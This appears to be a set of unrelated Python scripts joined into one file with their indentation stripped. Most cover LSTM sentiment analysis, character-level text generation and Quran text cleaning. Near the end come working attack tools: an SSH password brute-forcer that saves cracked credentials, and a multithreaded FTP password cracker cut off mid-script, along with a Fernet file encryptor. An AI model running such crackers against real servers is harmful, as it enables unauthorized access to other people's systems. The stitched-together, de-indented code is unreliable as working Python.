embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
# pass to the LSTM cells
embed = tf.nn.embedding_lookup(embedding, inputs)
# stackup multiple LSTM layers
cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
# pass cell and input to cell, returns outputs for each time step
# and the final state of the hidden layer
# run the data through the rnn nodes
outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
# grab the last output
# use sigmoid for binary classification
predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
# calculate cost using MSE
cost = tf.losses.mean_squared_error(labels, predictions)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
# nodes to calculate the accuracy
correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
iteration = 1
for e in range(epochs):
state = sess.run(initial_state)
for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
y = np.array(y)
x = np.array(x)
feed = {inputs: x, labels: y[:, None],
keep_prob: 0.5,
initial_state: state}
loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
if iteration % 5 == 0:
print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
if iteration % 25 == 0:
val_acc = []
val_state = sess.run(cell.zero_state(batch_size, tf.float32))
for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
x, y = np.array(x), np.array(y)
feed = {inputs: x, labels: y[:, None],
keep_prob: 1, initial_state: val_state}
batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
val_acc.append(batch_acc)
print(f"val_acc: {np.mean(val_acc):.3f}")
iteration += 1
saver.save(sess, "chechpoints/sentiment1.ckpt")
test_acc = []
with tf.Session(graph=graph) as sess:
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
test_state = sess.run(cell.zero_state(batch_size, tf.float32))
for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
feed = {inputs: x,
labels: y[:, None],
keep_prob: 1,
initial_state: test_state}
batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
test_acc.append(batch_acc)
print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
n_batches = len(x) // batch_size
x, y = x[:n_batches*batch_size], y[:n_batches*batch_size]
for i in range(0, len(x), batch_size):
yield x[i: i+batch_size], y[i: i+batch_size]
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
punc = set(punctuation)
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
target = df['Text'].loc[i]
# X.append(''.join([ c.lower() for c in target if c not in punc ]))
X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
X[i, 1] = df['Score'].loc[i]
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur less than n times to be deleted from dataset
N = 10
# test size in ratio, train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length):
embedding_size = 64
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation='sigmoid'))
model.summary()
return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation="linear"))
if verbose:
model.summary()
return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
# df = pd.read_csv("data/Reviews.csv")
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
# preview
print(df.head())
print(df.tail())
vocab = []
# X = np.zeros((len(df)*2, 2), dtype=object)
X = np.zeros((len(df), 2), dtype=object)
# for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
# target = df['Text'].loc[i]
# score = df['Score'].loc[i]
# X[i, 0] = clean_text(target)
# X[i, 1] = score
# for word in X[i, 0].split():
# vocab.append(word)
# k = i+1
k = 0
for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
target = df['Summary'].loc[i]
score = df['Score'].loc[i]
X[i+k, 0] = clean_text(target)
X[i+k, 1] = score
for word in X[i+k, 0].split():
vocab.append(word)
# vocab = set(vocab)
vocab = Counter(vocab)
# delete words that occur less than 10 times
vocab = { k:v for k, v in vocab.items() if v >= N }
# word to integer encoder dict
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# pickle int2vocab for testing
print("Pickling vocab2int...")
pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
# encoded reviews
for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
lengths = [ len(row) for row in X[:, 0] ]
print("min_length:", min(lengths))
print("max_length:", max(lengths))
X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
return X_train, X_test, y_train, y_test, vocab
import os
# disable keras loggings
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import keras
sys.stderr = stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Food Review evaluator")
parser.add_argument("review", type=str, help="The review of the product in text")
args = parser.parse_args()
review = tokenize_words(clean_text(args.review), vocab2int)
x = pad_sequences([review], maxlen=sequence_length)
print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
validation_data=(X_test, y_test),
batch_size=batch_size,
callbacks=[checkpointer])
import numpy as np
from string import punctuation
# make it a set to accelerate tests
punc = set(punctuation)
def clean_text(text):
return ''.join([ c.lower() for c in str(text) if c not in punc ])
def tokenize_words(words, vocab2int):
words = words.split()
tokenized_words = np.zeros((len(words),))
for j in range(len(words)):
try:
tokenized_words[j] = vocab2int[words[j]]
except KeyError:
# didn't add any unk, just ignore
pass
return tokenized_words
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# output:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
for c in "!":
text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
# if i == 1:
# break
# print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
# for t, char in enumerate(sentence):
# X[i, t, char2int[char]] = 1
# y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
chars_per_batch = batch_size * n_steps
n_batches = len(sentences) // chars_per_batch
while True:
for i in range(0, len(sentences), batch_size):
X = np.zeros((batch_size, sequence_length, n_unique_chars))
y = np.zeros((batch_size, n_unique_chars))
for i, sentence in enumerate(sentences[i: i+batch_size]):
for t, char in enumerate(sentence):
X[i, t, char2int[char]] = 1
y[i, char2int[y_train[i]]] = 1
yield X, y
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
to_be_removed = unique_chars - arabic_alpha
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
text = text.replace("", ".")
for char in to_be_removed:
text = text.replace(char, "")
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
batch_normalization=True, bidirectional=True)
params = {
"units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
# if bidirectional:
# model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
# else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if i == num_layers - 1:
return_sequences = False
else:
return_sequences = True
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=return_sequences)))
else:
model.add(cell(units, return_sequences=return_sequences))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(output_dim, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
return model
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return int2char[np.argmax(logits, axis=0)]
# return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
new_chars = ""
for i in range(n_chars):
x = np.array(text_to_sequence(initial_text))
x, _ = get_data(x, 64, n_steps, 1)
pred = model.predict(x)[0][0]
c = logits_to_text(pred)
new_chars += c
initial_text += c
return new_chars
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
for i, t in enumerate(train):
if i == 2:
break
print(t[0])
print(np.array(t[0]).shape)
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
# os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
# epochs=30,
# validation_data=(test),
# steps_per_epoch=train_steps_per_epoch,
# validation_steps=test_steps_per_epoch,
# callbacks=[checkpointer],
# verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
int2char, char2int = None, None
def read_data(load=False):
global int2char
global char2int
with open("E:\\datasets\\text\\my_python_code.py") as f:
text = f.read()
unique_chars = set(text)
if not load:
int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
pickle.dump(int2char, open("results/int2char.pickle", "wb"))
pickle.dump(char2int, open("results/char2int.pickle", "wb"))
else:
int2char = pickle.load(open("results/int2char.pickle", "rb"))
char2int = pickle.load(open("results/char2int.pickle", "rb"))
return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
if output_format == "many":
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
elif output_format == "one":
while True:
# X = np.zeros((arr.shape[1], n_steps))
# y = np.zeros((arr.shape[1], 1))
# for i in range(n_samples-n_steps):
# X[i] = np.array([ p.replace(",", "") if isinstance(p, str) else p for p in df.Price.iloc[i: i+n_steps] ])
# price = df.Price.iloc[i + n_steps]
# y[i] = price.replace(",", "") if isinstance(price, str) else price
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
y = np.expand_dims(y, axis=0)
yield x.reshape(1, x.shape[0], x.shape[1]), y
def get_data(arr, batch_size, n_steps, vocab_size):
# n_samples = len(arr) // n_seq
# X = np.zeros((n_seq, n_samples))
# Y = np.zeros((n_seq, n_samples))
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
# for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
# x = arr[i:i+n_seq]
# y = arr[i+1:i+n_seq+1]
# if len(x) != n_seq or len(y) != n_seq:
# break
# X[:, index] = x
# Y[:, index] = y
X = np.zeros((batch_size, arr.shape[1]))
Y = np.zeros((batch_size, vocab_size))
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
# y = np.expand_dims(y, axis=1)
X[:, n: n+n_steps] = x
Y[n] = y
# yield x.reshape(1, x.shape[0], x.shape[1]), y
return np.expand_dims(X, axis=1), Y
# return n_samples
# return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
if output_format == "many":
return len(arr) // n_seq
elif output_format == "one":
return len(arr) - n_seq
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def sequence_to_text(sequence):
global int2char
return ''.join([ int2char[i] for i in sequence ])
import json
import os
import glob
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
filename = os.path.join(CUR_DIR, "data", "json", filename)
file = json.load(open(filename, encoding="utf8"))
content = file['verse']
for verse_id, ayah in content.items():
text += f"{ayah}."
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
print(text, file=quran_file)
import paramiko
import socket
import time
from colorama import init, Fore
# initialize colorama
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
BLUE = Fore.BLUE
def is_ssh_open(hostname, username, password):
# initialize SSH client
client = paramiko.SSHClient()
# add to know hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password, timeout=3)
except socket.timeout:
# this is when host is unreachable
print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
return False
except paramiko.AuthenticationException:
print(f"[!] Invalid credentials for {username}:{password}")
return False
except paramiko.SSHException:
print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
# sleep for a minute
time.sleep(60)
return is_ssh_open(hostname, username, password)
else:
# connection was established successfully
print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
return True
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
parser.add_argument("-u", "--user", help="Host username.")
# parse passed arguments
args = parser.parse_args()
host = args.host
passlist = args.passlist
user = args.user
# read the file
passlist = open(passlist).read().splitlines()
# brute-force
for password in passlist:
if is_ssh_open(host, user, password):
# if combo is valid, save it to a file
open("credentials.txt", "w").write(f"{user}{host}:{password}")
break
from cryptography.fernet import Fernet
import os
def write_key():
"""
Generates a key and save it into a file
"""
key = Fernet.generate_key()
with open("key.key", "wb") as key_file:
key_file.write(key)
def load_key():
"""
Loads the key from the current directory named key.key
"""
return open("key.key", "rb").read()
def encrypt(filename, key):
"""
Given a filename (str) and key (bytes), it encrypts the file and write it
"""
f = Fernet(key)
with open(filename, "rb") as file:
# read all file data
file_data = file.read()
# encrypt data
encrypted_data = f.encrypt(file_data)
# write the encrypted file
with open(filename, "wb") as file:
file.write(encrypted_data)
def decrypt(filename, key):
"""
Given a filename (str) and key (bytes), it decrypts the file and write it
"""
f = Fernet(key)
with open(filename, "rb") as file:
# read the encrypted data
encrypted_data = file.read()
# decrypt data
decrypted_data = f.decrypt(encrypted_data)
# write the original file
with open(filename, "wb") as file:
file.write(decrypted_data)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Simple File Encryptor Script")
parser.add_argument("file", help="File to encrypt/decrypt")
parser.add_argument("-g", "--generate-key", dest="generate_key", action="store_true",
help="Whether to generate a new key or use existing")
parser.add_argument("-e", "--encrypt", action="store_true",
help="Whether to encrypt the file, only -e or -d can be specified.")
parser.add_argument("-d", "--decrypt", action="store_true",
help="Whether to decrypt the file, only -e or -d can be specified.")
args = parser.parse_args()
file = args.file
generate_key = args.generate_key
if generate_key:
write_key()
# load the key
key = load_key()
encrypt_ = args.encrypt
decrypt_ = args.decrypt
if encrypt_ and decrypt_:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
elif encrypt_:
encrypt(file, key)
elif decrypt_:
decrypt(file, key)
else:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
import ftplib
from threading import Thread
import queue
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
# init()
# initialize the queue
q = queue.Queue()
# port of FTP, aka 21
port = 21
def connect_ftp():
global q
while True:
# get the password from the queue
password = q.get()
# initialize the FTP server object
server = ftplib.FTP()
print("[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
pass
else:
# correct credentials
print(f"{Fore.GREEN}[+] Found credentials: ")
print(f"\tHost: {host}")
print(f"\tUser: {user}")
print(f"\tPassword: {password}{Fore.RESET}")
# we found the password, let's clear the queue
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally:
# notify the queue that the task is completed for this password
q.task_done()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="FTP Cracker made with Python")
parser.add_argument("host", help="The target host or IP address of the FTP server")
parser.add_argument("-u", "--user", help="The username of target FTP server")
parser.add_argument("-p", "--passlist", help="The path of the pass list")
parser.add_argument("-t", "--threads", help="Number of workers to spawn for logining, default is 30", default=30)
args = parser.parse_args()
# hostname or IP address of the FTP server
host = args.host
# username of the FTP server, root as default for linux
user = args.user
passlist = args.passlist
# number of threads to spawn
n_threads = args.threads
# read the wordlist of passwords
